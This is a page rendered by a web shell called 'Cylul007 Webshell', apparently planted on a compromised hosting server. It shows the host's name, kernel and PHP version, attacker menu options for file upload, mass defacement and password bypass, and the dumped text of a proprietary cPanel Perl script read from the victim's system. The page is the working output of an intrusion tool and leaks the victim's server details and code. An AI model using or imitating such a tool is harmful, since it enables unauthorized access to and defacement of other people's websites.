Cylul007 Webshell
Server :
Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
php :
8.0.30
on
cgi-fcgi
Time
25 Nov 2024 16:54:40
Current Directory :
/
scripts
/
Upload File :
Mass Deface
Home
Bypass Passwd
Current File : //scripts/validate_sshkey_passphrase
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/validate_sshkey_passphrase Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package scripts::validate_sshkey_passphrase; use strict; use Cpanel::Exception (); use Cpanel::SSH::KeyBackend (); use Cpanel::AdminBin::Serializer (); use Try::Tiny; __PACKAGE__->script(@ARGV) unless caller(); sub script { my ( $class, @argv ) = @_; local $/; my $path = $argv[0]; #We purposely do NOT chomp() the $passphrase. my $passphrase = readline( \*STDIN ); my $err; my $response = { 'status' => 0 }; try { $response->{'valid'} = Cpanel::SSH::KeyBackend::validate_key_passphrase( $path, $passphrase ); $response->{'status'} = 1; } catch { $err = $_; }; if ($err) { $response->{'class'} = ( ref $err ); $response->{'error_string'} = Cpanel::Exception::get_string($err); } print Cpanel::AdminBin::Serializer::Dump($response); return; } 1;
./LuLlaby007 ♥ Tata Cantik - Copyright 2k18